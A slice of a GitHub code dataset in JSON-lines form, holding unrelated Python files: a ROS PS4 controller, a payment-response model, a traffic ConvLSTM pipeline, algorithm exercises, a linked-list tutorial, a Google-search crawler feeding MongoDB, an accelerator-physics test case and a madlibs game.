abs(turn))\t\t\n\n\t\tmsg.linear.x = float(round(leftFront*255))\n\t\tmsg.linear.y = float(round(rightFront*255))\n\t\tmsg.angular.x = float(round(leftBack*255))\n\t\tmsg.angular.y = float(round(rightBack*255))\n\n\n\n\t\tself.sent_drive.publish(msg)\n\n\tdef check_bouncing(self, com, arr):\n\t\tfor i in arr:\n\t\t\tif i == com:\n\t\t\t\treturn False\n\t\treturn True\n\ndef main():\n\trclpy.init()\n\n\tsub = Ps4()\n\trclpy.spin(sub)\n\n\trclpy.shutdown()\n\nif __name__==\"__main__\":\n\tmain()\n","repo_name":"PoommipatWat/ABU","sub_path":"ps4.py","file_name":"ps4.py","file_ext":"py","file_size_in_byte":2872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"23013579759","text":"class Response_Model:\n def __init__(self,status=None,customerReferenceNumber=None,bankReferenceNumber=None,TransRefNo=None,BeneName=None,errorDetails=None,errorCode=None,errorDescription=None,errorType=None,errorSource=None,timestamp=None):\n self.status=status\n self.customerReferenceNumber=customerReferenceNumber\n self.bankReferenceNumber=bankReferenceNumber\n self.TransRefNo=TransRefNo\n self.BeneName=BeneName\n self.errorDetails=errorDetails\n self.errorCode=errorCode\n self.errorDescription=errorDescription\n self.errorType=errorType\n self.errorSource=errorSource\n self.timestamp=timestamp\n @staticmethod\n def from_json(json={}):\n response_model=Response_Model()\n response_model.status=json[\"status\"]\n response_model.customerReferenceNumber=json[\"customerReferenceNumber\"]\n response_model.bankReferenceNumber=json[\"bankReferenceNumber\"]\n response_model.BeneName=json[\"BeneName\"]\n response_model.errorDetails=json[\"errorDetails\"]\n response_model.errorCode=json[\"errorCode\"]\n response_model.errorDescription=json[\"errorDescription\"]\n response_model.errorType=json[\"errorType\"]\n 
response_model.errorSource=json[\"errorSource\"]\n response_model.timestamp=json[\"timestamp\"]\n response_model.TransRefNo=json['TransRefNo']\n return response_model\n\n","repo_name":"Official-BlackHat13/testpayoutaction","sub_path":"apis/bank_models/ICICI_Model/payment_response_model.py","file_name":"payment_response_model.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"40625160484","text":"from util.grid import *\nimport json\nimport pickle\nimport calendar\nimport numpy as np\nimport pandas as pd\nimport util.PredictionUtil as pu\n\nfrom util.ConstructUtil import *\nfrom collections import defaultdict\nfrom collections import OrderedDict\nfrom treelib import Tree,Node\nfrom util.params import Params as param\n\n\n\n\nfrom model.convLSTM import *\n#from CNN_LSTM import *\n#from Model.C3D_convLSTM import *\nfrom keras.models import load_model\n\ndef get_congestion_tree(treefile, children_dict):\n treefile = \"/home/dixl/project/traffic_project/data/new_alltrees.json\"\n with open(treefile, \"r\") as fi:\n trees = json.load(fi)\n congestion_pattern = trees['alltrees']\n new_congestion_pattern = list()\n for pattern in congestion_pattern:\n if pattern not in new_congestion_pattern:\n new_congestion_pattern.append(pattern)\n repeat_pattern = list()\n n = len(new_congestion_pattern)\n for i in range(n):\n for j in range(i+1, n):\n if set(new_congestion_pattern[j]).issubset(new_congestion_pattern[i]):\n if new_congestion_pattern[j] not in repeat_pattern:\n repeat_pattern.append(new_congestion_pattern[j])\n\n if set(new_congestion_pattern[i]).issubset(new_congestion_pattern[j]):\n if new_congestion_pattern[i] not in repeat_pattern:\n repeat_pattern.append(new_congestion_pattern[i])\n new_congestion_pattern_ = list()\n for pattern in new_congestion_pattern:\n if pattern not in repeat_pattern:\n new_congestion_pattern_.append(pattern)\n congestion_tree_list = list()\n for nodes in new_congestion_pattern_:\n congestion_tree = Tree()\n used_nodes = defaultdict(list)\n used_nodes[0].append(nodes[0])\n congestion_tree.create_node(nodes[0],nodes[0])\n i=0\n while len(used_nodes[i]) != 0:\n for used_node in used_nodes[i]:\n for node in nodes:\n if used_node in children_dict[node]:\n if node not in list(congestion_tree.nodes.keys()):\n congestion_tree.create_node(node,node, parent = used_node)\n used_nodes[i+1].append(node)\n i+=1\n congestion_tree_list.append(congestion_tree)\n return congestion_tree_list\n\n\n\ndef get_min_max_GPS(data_dict):\n min_lon=1000\n min_lat=1000\n max_lon=0\n max_lat=0\n for key in data_dict:\n for row in data_dict[key]:\n for point in row:\n if point[0] > max_lat:\n max_lat = point[0]\n if point[0] < min_lat:\n min_lat = point[0]\n if point[1] > max_lon:\n max_lon = point[1]\n if point[1] < min_lon:\n min_lon = point[1]\n return min_lon, min_lat, max_lon, max_lat\ndef get_min_max_xy(data_dict):\n min_lon=1000\n min_lat=1000\n max_lon=0\n max_lat=0\n for point in data_dict:\n# point = data_dict[key]\n if point[0] > max_lat:\n max_lat = point[0]\n if point[0] < min_lat:\n min_lat = point[0]\n if point[1] > max_lon:\n max_lon = point[1]\n if point[1] < min_lon:\n min_lon = point[1]\n return min_lon, min_lat, max_lon, max_lat\n\n\ndef make_road_grid(n_c_p, shps, no_key):\n data_dict = dict()\n for no in n_c_p:\n data_dict[no_key[no]] = shps[no_key[no]]\n min_lon, min_lat, max_lon, max_lat = get_min_max_GPS(data_dict)\n\n len_x = cal_distance([min_lat, min_lon], [max_lat, 
min_lon])\n len_y = cal_distance([min_lat, min_lon], [min_lat, max_lon])\n k = int((len_x+len_y)/200)\n if k==0:\n k=2\n ag = AreaGrid(k, min_lon, min_lat, max_lon, max_lat)\n\n keys = list(data_dict.keys())\n raw_road_grid = dict()\n for key in keys:\n grid_no = defaultdict(list)\n for row in data_dict[key]:\n for point in row:\n no = ag.gid(point)\n grid_no[no].append(point)\n raw_road_grid[key] = grid_no\n\n road_grid = defaultdict(list)\n for key in raw_road_grid:\n for no in raw_road_grid[key]:\n flag = 0\n if len(raw_road_grid[key][no]) > 2:\n flag=1\n road_grid[key].append(no)\n if flag==0:\n for no in raw_road_grid[key]:\n if no not in road_grid[key]:\n road_grid[key].append(no)\n keys = list(data_dict.keys())\n grid_road = defaultdict(list)\n for key in keys:\n for row in data_dict[key]:\n for point in row:\n no = ag.gid(point)\n str_key = key\n if str_key not in grid_road[no]:\n grid_road[no].append(str_key)\n\n return road_grid,grid_road,ag,k\n\n\ndef judge_grid(road1_name, road2_name,shps):\n shp1 = get_end_point(shps[road1_name])\n shp2 = get_end_point(shps[road2_name])\n if shp1[1] ==shp2[0]:\n lat_d = abs(shp1[0][0]-shp2[1][0])\n long_d = abs(shp1[0][1]-shp2[1][1])\n if lat_d > long_d:#2,7\n if shp1[0][0]>shp2[1][0]:\n return 8\n else:\n return 2\n else:\n if shp1[0][1]>shp2[1][1]:\n return 4\n else:\n return 6\n else:\n lat_d = abs(shp1[1][0]-shp2[0][0])\n long_d = abs(shp1[1][1]-shp2[0][1])\n if lat_d > long_d:#2,7\n if shp1[1][0]>shp2[0][0]:\n return 8\n else:\n return 2\n else:\n if shp1[1][1]>shp2[0][1]:\n return 4\n else:\n return 6\n\n\ndef judge_position(road1, road2, road1_name, road2_name, k,shps):\n\n if len(road1)>2:\n r1 = road1[1]\n else:\n r1 = road1[0]\n if len(road2)>2:\n r2 = road2[-2]\n else:\n r2 = road2[0]\n\n if int(r1/k)!=int(r2/k):#不同行\n ##\n if int(r1/k) > int(r2/k):#进入7,8,9\n if (r1-r2)%kint(k/2):\n return 9\n else:\n return 8\n else:\n if (r1-r2)%kint(k/2):\n return 1\n else:\n return 2\n else:#同行\n if r1>r2:\n return 4\n elif r1=10:\n for id_ in [1,2,3,4,6,7,8,9]:\n raw_position = get_position_2(road1_name,id_,road_relative_position)\n if raw_position not in position_road:\n road_relative_position[road2_name] = raw_position\n position_road[raw_position] = road2_name\n flag = 1\n break\n min_y, min_x, max_y, max_x = get_min_max_xy(position_road)\n rows = max_y - min_y + 1\n cols = max_x - min_x + 1\n number_road = dict()\n road_number = dict()\n for position in position_road:\n no = (position[1]-min_y)*cols + (position[0]-min_x) + 1\n number_road[no] =position_road[position]\n road_number[position_road[position]] = no\n mat_congestion = defaultdict(dict)\n nos =[i for i in range(1,rows*cols+1)]\n for dt in date_road_dict:\n weekday = calendar.weekday(int(dt[:4]),int(dt[5:7]),int(dt[8:10]))\n if workday:\n if weekday>4:\n continue\n else:\n if weekday<5:\n continue\n for no in nos:\n if no in number_road and number_road[no] in date_road_dict[dt]:\n mat_congestion[dt][no] = date_road_dict[dt][number_road[no]]\n else:\n mat_congestion[dt][no] = 0\n nos_reverse = [i for i in range(rows*cols,0,-1)]\n data_sort = pd.DataFrame.from_dict(mat_congestion, orient=\"index\", columns=nos_reverse)\n def fillna(data):\n nan_position = np.where(np.isnan(data))\n for i in range(len(nan_position[0])):\n x=nan_position[0][i]\n y=nan_position[1][i]\n if x==(data.shape[0]-1):\n data.iloc[x,y] = data.iloc[x-1,y]\n continue\n if x==0:\n if np.isnan(data.iloc[x+1,y]):\n for j in range(x+2,data.shape[0]):\n flag=0\n if np.isnan(data.iloc[j,y])==False:\n data.iloc[x,y] = 
(data.iloc[x-1,y] + data.iloc[j,y])/2\n flag=1\n continue\n if flag==0:\n data.iloc[x,y] = data.iloc[x-1,y]\n continue\n else:\n data.iloc[x,y] = data.iloc[x+1,y]\n continue\n if np.isnan(data.iloc[x+1,y]):\n for j in range(x+2,data.shape[0]):\n flag=0\n if np.isnan(data.iloc[j,y])==False:\n data.iloc[x,y] = (data.iloc[x-1,y] + data.iloc[j,y])/2\n flag=1\n break\n if flag==0:\n data.iloc[x,y] = data.iloc[x-1,y]\n else:\n data.iloc[x,y] = (data.iloc[x-1,y] + data.iloc[x+1,y])/2\n return data\n# date_index = pd.date_range(start=startTime,end=endTime,freq=\"min\",closed='left')\n date_index = list(mat_congestion.keys())\n date_index =pd.DataFrame(date_index,columns=[\"rawTime\"]).set_index(\"rawTime\")\n data_sort = date_index.join(data_sort)\n data_sort = fillna(data_sort)\n return data_sort,rows,cols,road_number,number_road\n\n\ndef reshape_data(data, split_num=1440, rows=39, cols=23, length=20):\n\n raw_data = data.values.reshape(data.shape[0],rows,cols,1)\n train_data = raw_data[:-split_num]\n test_data = raw_data[-split_num:]\n train_X, train_y = pu.split_X_y(train_data, length)\n test_X, test_y = pu.split_X_y(test_data, length)\n\n return train_X, train_y, test_X, test_y\n\n\ndef train(data_sort, rows, cols, number_road):\n\n train_X, train_y, test_X, test_y = reshape_data(data_sort, param.split_num, rows, cols, param.sequence_length)\n conv_model, conv_testy, conv_predicted = convLSTM_model(train_X, train_y, test_X, test_y, param.unit, param.epochs)\n# train_y = train_y.reshape(train_y.shape[0],train_y.shape[1]*train_y.shape[2])\n# test_y=test_y.reshape(test_y.shape[0],test_y.shape[1]*test_y.shape[2])\n# cnn_model, cnn_testy, cnn_predicted = CNN_LSTM_model(train_X, train_y, test_X, test_y,1)\n from sklearn.metrics import mean_squared_error\n from sklearn.metrics import mean_absolute_error\n\n testy_, predicted_ = get_reshape_data(conv_testy, conv_predicted, rows, cols)\n# testy_, predicted_ = cnn_testy, cnn_predicted\n true_y = list()\n predict_y = list()\n for n in range(testy_.shape[0]):\n for no in list(number_road.keys()):\n true_y.append(testy_[n][-no])\n predict_y.append(predicted_[n][-no])\n mse = mean_squared_error(true_y, predict_y)\n mae = mean_absolute_error(true_y, predict_y)\n print(\"mse=\",mse)\n print(\"mae=\",mae)\n return mse,mae","repo_name":"shirleyDXL/CPM-ConvLSTM","sub_path":"model/supervisor.py","file_name":"supervisor.py","file_ext":"py","file_size_in_byte":14097,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"20"} +{"seq_id":"10893927507","text":"# coding:utf-8\r\n\r\n'''\r\ndate: 2017/11/5\r\ncontent: \r\n给出一个所有元素以升序排序的单链表,将它转换成一棵高度平衡的二分查找树\r\n\r\n样例\r\n 2\r\n1->2->3 => / \\\r\n 1 3\r\n'''\r\n\"\"\"\r\nDefinition of ListNode\r\n\"\"\"\r\nclass ListNode(object):\r\n\r\n def __init__(self, val, next=None):\r\n self.val = val\r\n self.next = next\r\n\r\n\"\"\"\r\nDefinition of TreeNode:\r\n\"\"\"\r\nclass TreeNode:\r\n def __init__(self, val):\r\n self.val = val\r\n self.left, self.right = None, None\r\n\r\n\r\nclass Solution:\r\n \"\"\"\r\n @param: head: The first node of linked list.\r\n @return: a tree node\r\n \"\"\"\r\n\r\n def sortedListToBST(self, head):\r\n if head is None:\r\n return head\r\n\r\n ret = self.bstHelper(head)\r\n return ret\r\n\r\n def bstHelper(self, head, mid=None):\r\n if head == mid:\r\n return\r\n if head.next == mid:\r\n return TreeNode(head.val)\r\n\r\n # step 1: find the middle point\r\n fast, slow = head, head\r\n while fast.next != mid and fast.next.next != mid:\r\n fast = 
fast.next.next\r\n slow = slow.next\r\n\r\n # step 2: key point -- how to set the limit of each side\r\n root = TreeNode(slow.val)\r\n left_stop = slow\r\n right_stop = mid\r\n right_start = slow.next\r\n\r\n # step 3: construct the ROOT\r\n root.left = self.bstHelper(head, left_stop)\r\n root.right = self.bstHelper(right_start, right_stop)\r\n\r\n return root\r\n\r\nif __name__ == '__main__':\r\n node = ListNode(1)\r\n node.next = ListNode(2)\r\n node.next.next = ListNode(3)\r\n node.next.next.next = ListNode(4)\r\n node.next.next.next.next = ListNode(5)\r\n\r\n s = Solution()\r\n ret = s.sortedListToBST(node)\r\n print(ret.val)\r\n\r\n'''\r\nso fucking hard! lol!!\r\n1.首先找到中间点mid,还是采用和sort_list中相同的思路:采用fast和slow的快慢指针\r\n2.第二步是关键,要找到下一次递归的左区间端点和右区间的端点(我在这里浪费了许多时间)\r\n3.第三步就是递归创建二叉平衡树\r\n'''","repo_name":"hanztup/yuangcode","sub_path":"lintcode/class6/must/covert_list_to_balanced_bst.py","file_name":"covert_list_to_balanced_bst.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"39374767781","text":"# 문제> google 검색해서 타이틀과 내용을 크롤링하여 50 ~ 60개 데이터를\r\n# 몽고 DB에 저장하세요.\r\n# 필드 : name, title, contents, regdate, hit ( name : 아무개)\r\n\r\n# DB 테스트 자료 만들기 위한 크롤링\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom pymongo import MongoClient, collection\r\nfrom datetime import datetime\r\n\r\nclient = MongoClient(host=\"localhost\", port = 27017)\r\ndb = client.webtest\r\ncollection = db.board\r\n\r\n# https://www.google.com/search?q=%ED%94%84%EB%A1%9C%EC%95%BC%EA%B5%AC&start=30\r\n\r\nheader = {\"user-agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\"}\r\n\r\nfor i in range(2):\r\n url = \"https://www.google.com/search?q={}&start={}\".format(\"투수\", i*10)\r\n res = requests.get(url, headers=header)\r\n\r\n bs = BeautifulSoup(res.text, \"lxml\")\r\n\r\n lists = bs.select(\"div.tF2Cxc\")\r\n # print(len(lists))\r\n\r\n for li in lists:\r\n current_utc_time = round(datetime.utcnow().timestamp()*1000)\r\n\r\n try:\r\n title = li.select_one(\"h3.LC20lb.DKV0Md\").text\r\n # print(title)\r\n contents = li.select_one(\"div.VwiC3b.yXK7lf.MUxGbd.yDYNvb.lyLwlc.lEBKkf\").text\r\n # print(\"컨텐츠 : \", contents)\r\n\r\n collection.insert_one({\r\n \"name\":\"아무개\",\r\n \"title\":title,\r\n \"contents\":contents,\r\n \"regdate\":current_utc_time,\r\n \"hit\":0\r\n }) \r\n except:\r\n pass\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"codingq007/python","sub_path":"11_04_python_flask/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"3989577132","text":"# D2\n# 노드의 거리\n\ndef is_connected(start, cnt):\n global result\n\n if cnt >= result:\n return\n\n if start == G:\n if cnt < result:\n result = cnt\n return\n\n for end in range(1, V+1):\n if adj[start][end] and not visited[start][end]:\n visited[start][end] = 1\n is_connected(end, cnt+1)\n visited[start][end] = 0\n\n\nT = int(input())\nfor tc in range(1, T+1):\n V, E = map(int, input().split())\n adj = [[0] * (V+1) for _ in range(V+1)]\n for _ in range(E):\n s, e = map(int, input().split())\n adj[s][e] = 1\n adj[e][s] = 1\n\n visited = [[0] * (V+1) for _ in range(V+1)]\n S, G = map(int, input().split())\n result = V + 1\n is_connected(S, 0)\n if result == V + 1:\n result = 0\n\n print('#{} {}'.format(tc, 
result))","repo_name":"charleyCho/algo","sub_path":"swea/queue/5102.py","file_name":"5102.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"74424474288","text":"import numpy as np\r\nfrom input_parameters.preprocess import *\r\nfrom input_parameters.general_parameters import *\r\nimport matplotlib.pyplot as plt\r\nfrom beams.beams import *\r\nfrom input_parameters.rf_parameters import *\r\nfrom beams.slices import *\r\nfrom monitors.monitors import *\r\nfrom trackers.tracker import *\r\n\r\n'''\r\nTest case to show how to use preprocess_ramp and preprocess_rf_params in the main file\r\n(CERN PS Booster context).\r\n'''\r\n\r\n# Beam parameters\r\nparticle_type = 'proton'\r\nn_particles = 3e12\r\n\r\n\r\n# Machine and RF parameters\r\nradius = 25 # [m]\r\ngamma_transition = 4.076750841 # [1]\r\nalpha = 1 / gamma_transition**2 # [1] \r\nC = 2*np.pi*radius # [m] \r\n\r\n# Initial and final simulation times\r\ninitial_time = 0.275 # [s]\r\nfinal_time = 0.700 # [s]\r\n\r\nmomentum_program = np.loadtxt('../input_files/TC6_Source_TOF_P.csv', delimiter=',')\r\ntime_array = momentum_program[:, 0]*1e-3 # [s]\r\nmomentum = momentum_program[:, 1]*1e9 # [eV/c]\r\n\r\ninitial_index = np.min(np.where(time_array>=initial_time)[0])\r\nfinal_index = np.max(np.where(time_array<=final_time)[0])\r\n\r\ntime_cut = time_array[initial_index:(final_index+1)]\r\nmomentum_cut = momentum[initial_index:(final_index+1)]\r\n\r\nmomentum_interp = preprocess_ramp(particle_type, C, time_cut, momentum_cut, interpolation='linear', figdir='../output_files/TC6_fig')\r\n\r\nn_turns = len(momentum_interp[0])-1\r\n\r\ngeneral_params = GeneralParameters(n_turns, C, alpha, momentum_interp, \r\n particle_type)\r\n\r\n# Cavities parameters\r\nn_rf_systems = 2 \r\nharmonic_numbers_1 = 1 # [1] \r\nharmonic_numbers_2 = 2 # [1] \r\nphi_offset_1 = 0 # [rad]\r\nphi_offset_2 = np.pi # [rad]\r\n\r\nvoltage_program_C02 = np.loadtxt('../input_files/TC6_voltage_program_LHC25_c02.txt')\r\nvoltage_program_C04 = np.loadtxt('../input_files/TC6_voltage_program_LHC25_c04.txt')\r\nvoltage_program_C16 = np.loadtxt('../input_files/TC6_voltage_program_LHC25_c16.txt')\r\ntime_C02 = voltage_program_C02[:, 0]*1e-3 # [s]\r\nvoltage_C02 = voltage_program_C02[:, 1]*1e3 # [V]\r\ntime_C04 = voltage_program_C04[:, 0]*1e-3 # [s]\r\nvoltage_C04 = voltage_program_C04[:, 1]*1e3 # [V]\r\ntime_C16 = voltage_program_C16[:, 0]*1e-3 # [s]\r\nvoltage_C16 = voltage_program_C16[:, 1]*1e3 # [V]\r\n\r\ndata_interp = preprocess_rf_params(general_params, [time_C02, time_C04, time_C16], [voltage_C02, voltage_C04, voltage_C16], interpolation='linear', smoothing = 0,\r\n plot=True, figdir='../output_files/TC6_fig', figname=['voltage_C02 [V]', 'voltage_C04 [V]', 'voltage_C16 [V]'], sampling=1)\r\n\r\nrf_params = RFSectionParameters(general_params, 2, [harmonic_numbers_1,harmonic_numbers_2], [data_interp[0], data_interp[1]], [phi_offset_1, phi_offset_2])\r\n","repo_name":"kiliakis/BLonD","sub_path":"__TEST_CASES/main_files/TC6_Preprocess.py","file_name":"TC6_Preprocess.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"12413952354","text":"from typing import List\n\n\nwith open(\"../data.txt\", \"r\") as f:\n input_data = [x.strip() for x in f.readlines()]\n\ndef invert_binary(number):\n temp = int(number, 2)\n inverse = temp ^ (2 ** (len(number) + 1) - 1)\n\n return 
str(bin(inverse)[3:])\n\ndef rating(data: List, position: int, is_most_common: bool) -> int:\n if len(data) == 1:\n return int(data[0], 2)\n \n one_occurrences = sum([int(binary_number[position]) for binary_number in data if binary_number[position] == \"1\"])\n same_occurrences = one_occurrences == len(data) / 2\n more_ones = one_occurrences > len(data) / 2\n\n new_data = []\n\n if is_most_common:\n if more_ones or same_occurrences:\n new_data = [binary_number for binary_number in data if binary_number[position] == \"1\"]\n else:\n new_data = [binary_number for binary_number in data if binary_number[position] == \"0\"]\n else:\n if more_ones or same_occurrences:\n new_data = [binary_number for binary_number in data if binary_number[position] == \"0\"]\n else:\n new_data = [binary_number for binary_number in data if binary_number[position] == \"1\"]\n\n return rating(new_data, position + 1, is_most_common)\n\n\ndef problem1():\n one_occurrences = [0] * len(input_data[0])\n\n for binary_number in input_data:\n for i, bit in enumerate(binary_number):\n if bit == \"1\":\n one_occurrences[i] += 1\n\n gamma = \"\"\n for occurrence in one_occurrences:\n if occurrence > len(input_data) / 2:\n gamma += \"1\"\n continue\n gamma += \"0\"\n\n epsilon = invert_binary(gamma)\n\n print(gamma, epsilon)\n\n n_gamma = int(gamma, 2)\n n_epsilon = int(epsilon, 2)\n\n print(f\"Result {n_gamma * n_epsilon}\")\n\n\ndef problem2():\n oxygen = rating(input_data, 0, True)\n co2 = rating(input_data, 0, False)\n print(oxygen * co2)\n\nif __name__ == '__main__':\n problem1()\n problem2()","repo_name":"danibaal98/advent-of-code-2021","sub_path":"day3/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"240521450","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %% [markdown]\n# ## AGENDA\n# \n# 1. Introduction to Linked lists\n# 2. Types of Linked lists\n# 3. Linked list implementation\n# 4. Practice and Exercises\n# %% [markdown]\n# ## Why do we need Linked lists?\n# %% [markdown]\n# Let's look at a simple list:\n# \n# ```our_simple_list = [290, 401, 156, 374, 239]```\n# \n# let's assume now that we want to insert a new element ```14``` at location 1. What Python does in a simple list when running that command, is to move all elements until the end of the list. \n# \n# ```our_simple_list.insert(1, 14)```\n# \n#
\n# \n#
\n# \n# %% [markdown]\n# Array insertion space complexity = O(n)\n# \n# What does this mean if we have 1 million elements? \n# %% [markdown]\n# ```Linked lists``` makes the insertion and deletion of elements cheaper because the values are stored in different areas of memory (lists store the values in contiguous memory location). \n# \n# The values of a linked lists are stored at random memory location, but are linked with each other by **pointers**.\n# %% [markdown]\n# # Linked List\n# \n# ## Singly Linked Lists\n# \n#
\n# \n#
\n# \n#
\n# \n# ## Doubly Linked Lists\n# \n#
\n# \n#
\n# %% [markdown]\n# ## Space complexity\n# \n# | Operation | List | Linked List |\n# | :- | -: | :-: |\n# | Indexing | O(1) | O(n) |\n# | Insert/Delete Element at Start | O(n) | O(1) |\n# | Insert/Delete Element at End | O(1) | O(1) |\n# | Insert/Delete Element at Middle | O(n) | O(n) |\n# %% [markdown]\n# ## Linked Lists Disadvantages\n# \n# 1. Random access is not allowed. You have to access elements sequentially starting from the first node. \n# 2. Extra memory space for a pointer is required with each element of the list.\n# 3. Not cache friendly.\n# %% [markdown]\n# ## Linked Lists vs Arrays\n# \n# **Linked lists are preferable over arrays when:**\n# \n# - you need constant-time insertions/deletions from the list (such as in real-time computing where time predictability is absolutely critical)\n# - you don't know how many items will be in the list.\n# - you don't need random access to any elements\n# \n# **Arrays are preferable when:**\n# \n# - you need indexed/random access to elements\n# - you know the number of elements in the array ahead of time so that you can allocate the correct amount of memory for the array\n# - you need speed when iterating through all the elements in sequence.\n# - memory is a concern. Filled arrays take up less memory than linked lists. Each element in the array is just the data. Each linked list node requires the data as well as one (or more) pointers to the other elements in the linked list.\n# %% [markdown]\n# # Linked List Implementation\n\n# %%\n''' APPROACH 1 '''\nclass Node:\n def __init__(self, value, nextNode = None):\n self.value = value # anything that you want to store (e.g., strings, integers, objects, etc)\n self.nextNode = nextNode #pointer to the next element in the linked list\n\n# '3' -> '7' -> '10'\n\nnode_1 = Node('3') # isolated node '3'\nnode_2 = Node('7') # isolated node '7'\nnode_3 = Node('10') # isolated node '10'\nnode_4 = Node('77') # isolated node '77'\n\nnode_1.nextNode = node_2 # node_1 points to node_2, '3' -> '7' \nnode_2.nextNode = node_3 # node_2 points to node_3, '7' -> '10' \n\n# node_1 -> node_2 -> node_3\n\n# Let's test it out \ncurrentNode = node_1 # node_1 is our head \nwhile True: \n print(currentNode.value, '-->', end=' ')\n if currentNode.nextNode is None: # ensure that the current node is not tail\n print('None')\n break\n currentNode = currentNode.nextNode # update with the next node \n\n\n# %%\n''' APPROACH 2'''\n\nclass Node:\n def __init__(self, value, nextNode = None):\n self.value = value # anything that you want to store (e.g., strings, integers, objects, etc)\n self.nextNode = nextNode #pointer to the next element in the linked list\n\nclass LinkedList: # initially empty \n def __init__(self, head = None):\n self.head = head \n\n def insert(self, value):\n node = Node(value) # create a node with the corresponding value \n if self.head is None: # check if there are other nodes \n self.head = node # if there are no other nodes, our current node is the head\n return \n\n # look at the head node and try to find the tail by traversing\n # the entire linked list \n currentNode = self.head\n while True:\n # satisfied only if the current node is tail\n if currentNode.nextNode is None: # if there is no node after the current node\n currentNode.nextNode = node \n break\n currentNode = currentNode.nextNode # otherwise, set the next to current node\n\n # method to print the linked list \n def print_linked_list(self):\n currentNode = self.head\n while currentNode is not None:\n print(currentNode.value, '-->', end=' 
')\n currentNode = currentNode.nextNode\n print('None')\n\nll = LinkedList()\nll.print_linked_list()\nll.insert('3')\nll.print_linked_list()\nll.insert('7')\nll.print_linked_list()\nll.insert('10')\nll.print_linked_list()\n\n# %% [markdown]\n# ## Linked Lists and Python \n# \n# Python does not have a linked list library built into it like some other programming languages so we need to create our own classes like above. However, there are some packages that can create data structures that behave as linked lists (but are not linked lists!), such as ```deque()```.\n\n","repo_name":"nasiana/Software-17-Linked-lists","sub_path":"linked_lists.py","file_name":"linked_lists.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"29166005278","text":"\n\"\"\"as refrence, I used this tutorial http://anh.cs.luc.edu/handsonPythonTutorial/madlib2.html\"\"\"\n\ndef main (): #https://www.pinterest.com/pin/375839531387234463 story found here.\n story = \"\"\" \\033[42m Pizza was invented by a \\033[0;32m{adjective} \\033[0;34m {nationality} chef named {name}. To make a pizza, you need to take a lump of \\033[0;37m {noun}, and make a thin, round \\033[4;33m{adjective} \\033[4;33m{noun}. Then you cover it with \\033[0;31m{adjective} sauce, \\033[0;35m {adjective} cheese, and fresh chopped \\033[1;31m{plural_noun}. Next you have to bake it in a very hot {noun}. When it is done, cut it into {number} {shapes}. some kids like {food} pizza. If I could, I would eat pizza {number} times a day. \"\"\"\n\n tellStory(story)\n print(\"come back Soon!\")\ndef getKeys(user_input):\n keylist = list ()\n end = 0\n words = user_input.count('{')\n for i in range (words):\n start = user_input.find('{', end) + 1\n end = user_input.find('}', start)\n key = user_input[start : end]\n keylist.append(key)\n\n return (keylist)\n\ndef addPicks(cue, dictionary): # \"Enter a specific example for {name}: \"\n user_input = \"Enter a {name} : \"\n prompt = user_input.format(name=cue)\n response = input(prompt)\n dictionary[cue] = response\n\ndef getUserPicks(cues):\n userPicks = dict()\n for cue in cues:\n addPicks(cue,userPicks)\n return userPicks\ndef tellStory(storyFormat):\n cues = getKeys(storyFormat)\n userPicks = getUserPicks(cues)\n story = storyFormat.format(**userPicks)\n print(story) \n\n\nmain()\n\n\n\n","repo_name":"xingY97/madlibs","sub_path":"madlibs2.py","file_name":"madlibs2.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"7794132903","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 25 14:20:20 2021\r\n\r\n@author: rahul\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport ast\r\nfrom Market_clearing import Market_clearing\r\n#%% Case data\r\n\r\nSetpoint_P = pd.read_csv('Data_Files\\Setpoint_P.csv',index_col='timetarget',converters={1:ast.literal_eval}) # Baseline injections at each node (negative for retrieval)\r\nSetpoint_P.columns = ['Setpoint_P']\r\nSetpoint_Q = pd.read_csv('Data_Files\\Setpoint_Q.csv',index_col='timetarget',converters={1:ast.literal_eval})\r\nSetpoint_Q.columns = ['Setpoint_Q']\r\n\r\nSetpoint=pd.DataFrame([], columns=['Setpoint_P','Setpoint_Q'], index=Setpoint_P.index)\r\n\r\nfor t in Setpoint_P.index:\r\n Setpoint.at[t,'Setpoint_P']=Setpoint_P.at[t,'Setpoint_P']\r\n Setpoint.at[t,'Setpoint_Q']=Setpoint_Q.at[t,'Setpoint_Q']\r\n \r\n# Index for nodes\r\nbus = 
